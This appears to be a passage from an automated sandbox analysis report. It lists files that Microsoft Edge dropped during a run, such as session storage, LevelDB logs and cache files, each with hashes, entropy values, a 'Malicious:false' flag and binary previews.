                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:iaODouHR28TvfFRtUKODiP2HHlY+a/MBYTC8AHlwqUTapCi1:iaOm
                                                                                                                                                                                                                                                                                                                                                              MD5:22745A8D3EF34E1484C12FC696E60090
                                                                                                                                                                                                                                                                                                                                                              SHA1:0FF60C3215DD9E9361DF2F5E08C9996CCC5A761E
                                                                                                                                                                                                                                                                                                                                                              SHA-256:1134BF22887DB1449CDB2242A511086D9B0B687CC9230F5D8064C3A1E0E487E9
                                                                                                                                                                                                                                                                                                                                                              SHA-512:520F44C78CBDFEE8520E105A4755FAC8901F74AEE2C3BEA06AC22E6C94D8E7469E330A8B3B5BF0F3DCFE5BA6632C797EF4E9A071EAA13191FD841B0C19CDD24B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............oE..e................next-map-id.1.Fnamespace-9bfaf295_46ae_4487_b763_0627be797324-https://www.scribd.com/.0d.f.o................next-map-id.2.Pnamespace-9bfaf295_46ae_4487_b763_0627be797324-https://www.googletagmanager.com/.1....b................next-map-id.3.Cnamespace-9bfaf295_46ae_4487_b763_0627be797324-https://i.liadm.com/.2}./.%~...............map-0-__pdst@1.5.c.8.e.1.2.0.6.8.7.9.4.4.a.8.a.4.6.a.7.4.b.8.d.d.d.9.0.b.f.f...map-0-fs.config..{.".f.s.u.i.d.".:.".1.3.0.b.0.d.c.d.-.8.7.c.8.-.4.1.f.1.-.9.4.6.c.-.8.e.7.4.5.4.7.c.3.9.0.5.".,.".n.e.t.w.o.r.k.M.a.p.".:.{.".n.e.t.w.o.r.k.s.".:.{.".1.".:.{.".i.d.".:.1.,.".a.c.t.i.v.e.".:.t.r.u.e.,.".b.i.d.A.d.j.u.s.t.m.e.n.t.".:.0.,.".a.l.l.o.w.e.d.G.e.o.s.".:.[.].,.".d.i.s.a.l.l.o.w.e.d.G.e.o.s.".:.[.].}.,.".2.".:.{.".i.d.".:.2.,.".a.c.t.i.v.e.".:.t.r.u.e.,.".b.i.d.A.d.j.u.s.t.m.e.n.t.".:.0.,.".a.l.l.o.w.e.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000004.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1930
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.23114361310102
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:0ujYsubAyuwHj7uZLI2ZXhur/ruHlIWujBuHKs/l3umjurqJun2CuYRTQdMluVCa:nWDoI2ZX+by3v6c6O7HvmC3kz2
                                                                                                                                                                                                                                                                                                                                                              MD5:01034BFA7344922A9AB230660F26FE8F
                                                                                                                                                                                                                                                                                                                                                              SHA1:D4B52F70468EF8223C07AD577318462A54344A64
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4898C57BDD0899037F1CDA23B6E27AD823A4A9C7C4402B8AF858EEE61F1F1F95
                                                                                                                                                                                                                                                                                                                                                              SHA-512:FC0F12CD16824F05BC6D425FE7A380B2234E3849B0A043907A1EA86E93A54698AC4DA8B4C1FE5029567A072E51A3DDBC8A20071182E4A2F0C7308B4C74DF4F5B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.Y$.d................next-map-id.4.Enamespace-9bfaf295_46ae_4487_b763_0627be797324-https://js.stripe.com/.3....g................next-map-id.5.Hnamespace-9bfaf295_46ae_4487_b763_0627be797324-https://m.stripe.network/.4<.P g................next-map-id.6.Hnamespace-9bfaf295_46ae_4487_b763_0627be797324-https://ads.pubmatic.com/.5$...r................next-map-id.7.Snamespace-9bfaf295_46ae_4487_b763_0627be797324-https://cs-server-s2s.yellowblue.io/.6y{.................y{..................X..h................next-map-id.8.Inamespace-9bfaf295_46ae_4487_b763_0627be797324-https://cdn.btmessage.com/.7...................-D"h................next-map-id.9.Inamespace-9bfaf295_46ae_4487_b763_0627be797324-https://sync.intentiq.com/.8...Vf................next-map-id.10.Fnamespace-9bfaf295_46ae_4487_b763_0627be797324-https://onetag-sys.com/.9F.".n..!.............next-map-id.11.Mnamespace-9bfaf295_46ae_4487_b763_0627be797324-https://s.amazon-adsystem.com/.10.\..d..#.............next-map-id.12.Cnamespace-

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000005.ldb

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):59180
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.796945778998013
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:9/ZIg3T7qKeaNqWd3N+RJ7LNNbna6pL2KyjBlmuwLD6GkjKyrC/Bq5ZRRrXGRpsa:RTneUz9+J7L3bojBlm3LDuyILRRLCpsa
                                                                                                                                                                                                                                                                                                                                                              MD5:BA9C3209D7CB62FE26E6D303E9B42C18
                                                                                                                                                                                                                                                                                                                                                              SHA1:0CBDC5C3A3BAEE642B0C353FD5D023E0433CF0A3
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0304EE14C499FD9FCC2623848D06F79D1DC603DFFB7F35433C64FB9C352D6738
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D672A42744A9BFCDE6EE0F30D9161FE8B4CE99C8FB10BD530C3E6B2BE653F09FD9EBEB043D699BCC6376D2A794E2E6F7B5A8AA370D33BE4A2B06166DEF6BDFAC
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:..D..@map-0-__pdst......1.5.c.8.e.1.2.0.6.8.7.9.4.4.a.8.a.4.6.a.7.4.b.8.d..d9.0.b.f.f.....fs.config...U\.{.".f.s.u.i.d.".:.".1.3.6 0.d.c.d.-.j.|(-.4.1.f.1.-.z.6.c...e.v 5.4.7.c.3.vh5.".,.".n.e.t.w.o.r.k.M.a.p.h.z6...s...1.....1.L(a.c.t.i.v.e.".t.r.u.e...b.,HA.d.j.u.s.t.m.e.n.t.*.0.$Ha.l.l.o.w.e.d.G.e.o.v.[.].".d.i.sz(..}.*.2.X.....2............7B...7......B...8B...8......B...9B...9.........".R.Uml.C...K.P...B.Y...S.D...I.R...S.S.".]M..1.0B....a.......A..".G...F...I.T...D.E...B.G.....L5..H...E%....C5(.L.V.<.C.Z...D.K...P.L...S.I...d.G.B...I...P...S.F.C.H.(.R.O...F.P.E.<.H...L.F.A...N...M..9.F...6........!....3Jp..3......J.....:2....P.~P..".UU.YZ.C.AM2.AE...F...R.......Y..M.X..Y..Su.Y..Bu..V.N.2y..Z.q..Nu.y..,.Mu.)<...Pu..T...J.@.^9..Hu.y.9..Nu.69.r..F...2.r..r.Jr..2.4B....!h.z..z..z.".L...Z.WMR.YU>.C.F...A.\.8.B...LUH.MU..M.F.`......V.(.C..V....Uu..!N.I.Q.....T.2J.....4......!....6J*..6......."...^.S5..@y..r..,."i.!j....r...A.x.r.J...|.r.@.F...2......J...2J....!T......6..F...

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):483
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.237263609342128
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:7jMB0VvdZYebCFUtx0g/hI5wZYebtZ9QlNf0CfnUXuqh:7jJbYeb2gx+gYeb/plh
                                                                                                                                                                                                                                                                                                                                                              MD5:3774D9CCDCBE68F384C88AC277F3B5DF
                                                                                                                                                                                                                                                                                                                                                              SHA1:AB7FC610B4470B1C9B4CC344EE9CD7F3A5B757A7
                                                                                                                                                                                                                                                                                                                                                              SHA-256:74E36D6A81AC29FC767A80CD933DB47D5AAB9B80EAC979658DB3FC138B1C2F6C
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E82EBAA54B6D80E62572DDF3AF251D675B8AFBD614E65449AFFC85C887BB00CD01520D5DC4463980A689E29D011700478250F8D2F14B9D410B63748F9FA0E921
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.452 1fd4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/02/18-02:16:43.459 1fd4 Recovering log #3.2025/02/18-02:16:43.465 1fd4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .2025/02/18-02:16:59.549 1c48 Level-0 table #5: started.2025/02/18-02:16:59.569 1c48 Level-0 table #5: 59180 bytes OK.2025/02/18-02:16:59.571 1c48 Delete type=0 #3.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):483
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.237263609342128
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:7jMB0VvdZYebCFUtx0g/hI5wZYebtZ9QlNf0CfnUXuqh:7jJbYeb2gx+gYeb/plh
                                                                                                                                                                                                                                                                                                                                                              MD5:3774D9CCDCBE68F384C88AC277F3B5DF
                                                                                                                                                                                                                                                                                                                                                              SHA1:AB7FC610B4470B1C9B4CC344EE9CD7F3A5B757A7
                                                                                                                                                                                                                                                                                                                                                              SHA-256:74E36D6A81AC29FC767A80CD933DB47D5AAB9B80EAC979658DB3FC138B1C2F6C
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E82EBAA54B6D80E62572DDF3AF251D675B8AFBD614E65449AFFC85C887BB00CD01520D5DC4463980A689E29D011700478250F8D2F14B9D410B63748F9FA0E921
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.452 1fd4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/02/18-02:16:43.459 1fd4 Recovering log #3.2025/02/18-02:16:43.465 1fd4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .2025/02/18-02:16:59.549 1c48 Level-0 table #5: started.2025/02/18-02:16:59.569 1c48 Level-0 table #5: 59180 bytes OK.2025/02/18-02:16:59.571 1c48 Delete type=0 #3.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):99
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.973897061542606
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjoxal4xigg5VvV9stfdEtl:scoBY7jmalzgg5VNOtKl
                                                                                                                                                                                                                                                                                                                                                              MD5:E1D9096B4C0D32346D9245DC92DC54A5
                                                                                                                                                                                                                                                                                                                                                              SHA1:1AD45961491A804335131F257424A8B29CD0352E
                                                                                                                                                                                                                                                                                                                                                              SHA-256:84F5D4A7A3D8DBB7D0D22B569031AFDC1A06B529CB6438C6B375D7085960BD50
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E34238E7813DA3DB234DFF0DC80315A57A53573F7C927435AE70CA2C830FE8636BCCAB8D4591D22B9FAE8CF0EDB73C3002C129F217A0850FEAEBC1358BEDA4EE
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......o..93.................map-0-__pdst.........version........

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13384336605253024

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):131674
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.114480134377635
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:3OM7Ma0AMawxSMawhuaCMawMWCuuU8I4MawrWMupE93uU8IdMawtWMupduiy8Ix:9Q5X74W33WMupTBWMup
                                                                                                                                                                                                                                                                                                                                                              MD5:EEB9052F06E017D96A1CD7BBA5BC8F1F
                                                                                                                                                                                                                                                                                                                                                              SHA1:B93ACE66637A8C4EE1C09AE863A2819508A00888
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0C18153929CD5BD6FD7DEB7D3F1B735B8DCC6DEF17B96BA35D240D01205CD67F
                                                                                                                                                                                                                                                                                                                                                              SHA-512:AF0BF513A500BFD90F7DF28329E5664C5B6A970B2666269B607058920BA7562C07E52D8DBB17CD1D9E25204E66421C634EE8795A3A453CCE8F336BDED36A70A9
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SNSS.......@..............@........."@..............@..........@..........A..........A.......!..A..................................@...A...1..,...A...$...9bfaf295_46ae_4487_b763_0627be797324...@..........A..................@......@..........................@.......................5..0...@...&...{F44A76A6-556E-4DC8-8BF2-CF26F02D08AD}.....@..........@.............................A..........|...A.......8...https://www.scribd.com/document/806838445/Bank-Statement............!.......................................................................................................UUlle...VUlle...@.......X...............P.......................................................x...8...h.t.t.p.s.:././.w.w.w...s.c.r.i.b.d...c.o.m./.d.o.c.u.m.e.n.t./.8.0.6.8.3.8.4.4.5./.B.a.n.k.-.S.t.a.t.e.m.e.n.t.................................8.......0.......8....................................................................... .......................................................P...$...f.0.b.0.d.e.3.1.-.3.7

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                                                              MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                                                              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                                                              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.147975370887372
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfjKVq2PFi23oH+Tcwt7Uh2ghZIFUtFfrpgZmw7frpIkwOFi23oH+Tcwt7Uh2w:7LKVvdZYebIhHh2FUtRpg/HpI5wZYebs
                                                                                                                                                                                                                                                                                                                                                              MD5:D669843E3A7B05FD9A721E9A58C4C460
                                                                                                                                                                                                                                                                                                                                                              SHA1:ED5F54EA8A260B4634FC0673E892B5F9D0B8BFEE
                                                                                                                                                                                                                                                                                                                                                              SHA-256:34BBA3D07441ED9CD59EA7E07F06ABBB75A7DB3003296B0E7AEE0BE21940BE99
                                                                                                                                                                                                                                                                                                                                                              SHA-512:956343BE7ECA2174CB6AD60877802AC7381AAB632A77497BB8F4980DEDA41492109A6C751B00E3E77098420B390E166114A6830B514F51A713A15913074DAA80
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.811 1bc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/02/18-02:16:42.812 1bc4 Recovering log #3.2025/02/18-02:16:42.812 1bc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.147975370887372
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfjKVq2PFi23oH+Tcwt7Uh2ghZIFUtFfrpgZmw7frpIkwOFi23oH+Tcwt7Uh2w:7LKVvdZYebIhHh2FUtRpg/HpI5wZYebs
                                                                                                                                                                                                                                                                                                                                                              MD5:D669843E3A7B05FD9A721E9A58C4C460
                                                                                                                                                                                                                                                                                                                                                              SHA1:ED5F54EA8A260B4634FC0673E892B5F9D0B8BFEE
                                                                                                                                                                                                                                                                                                                                                              SHA-256:34BBA3D07441ED9CD59EA7E07F06ABBB75A7DB3003296B0E7AEE0BE21940BE99
                                                                                                                                                                                                                                                                                                                                                              SHA-512:956343BE7ECA2174CB6AD60877802AC7381AAB632A77497BB8F4980DEDA41492109A6C751B00E3E77098420B390E166114A6830B514F51A713A15913074DAA80
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.811 1bc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/02/18-02:16:42.812 1bc4 Recovering log #3.2025/02/18-02:16:42.812 1bc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):430
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.269348352279586
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfv+q2PFi23oH+TcwtzjqEKj3K/2jMGIFUtFfT1XZmw7fXVVkwOFi23oH+Tcwy:7OvdZYebvqBQFUtpB/jb5wZYebvqBvJ
                                                                                                                                                                                                                                                                                                                                                              MD5:020380F1763FACED43C0DD9441E6C938
                                                                                                                                                                                                                                                                                                                                                              SHA1:0DFD36723462201BF3110625DBD8249E7281A37A
                                                                                                                                                                                                                                                                                                                                                              SHA-256:7D34239455BC05E1D29D01A9053A4DC96453CF2B21290EB3942C391170389492
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D0BBFDB564041A779647BE46F30B7E2FAC31A8CF3C4AF6CACF62271771F7C027BBF37793805C445384892577B697A4203844E187EE0196D88003E62541897B5A
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.469 1c48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/02/18-02:16:43.470 1c48 Recovering log #3.2025/02/18-02:16:43.474 1c48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):430
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.269348352279586
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfv+q2PFi23oH+TcwtzjqEKj3K/2jMGIFUtFfT1XZmw7fXVVkwOFi23oH+Tcwy:7OvdZYebvqBQFUtpB/jb5wZYebvqBvJ
                                                                                                                                                                                                                                                                                                                                                              MD5:020380F1763FACED43C0DD9441E6C938
                                                                                                                                                                                                                                                                                                                                                              SHA1:0DFD36723462201BF3110625DBD8249E7281A37A
                                                                                                                                                                                                                                                                                                                                                              SHA-256:7D34239455BC05E1D29D01A9053A4DC96453CF2B21290EB3942C391170389492
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D0BBFDB564041A779647BE46F30B7E2FAC31A8CF3C4AF6CACF62271771F7C027BBF37793805C445384892577B697A4203844E187EE0196D88003E62541897B5A
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.469 1c48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/02/18-02:16:43.470 1c48 Recovering log #3.2025/02/18-02:16:43.474 1c48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\29adef0d-94ca-4518-a936-1006ebe3602c.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
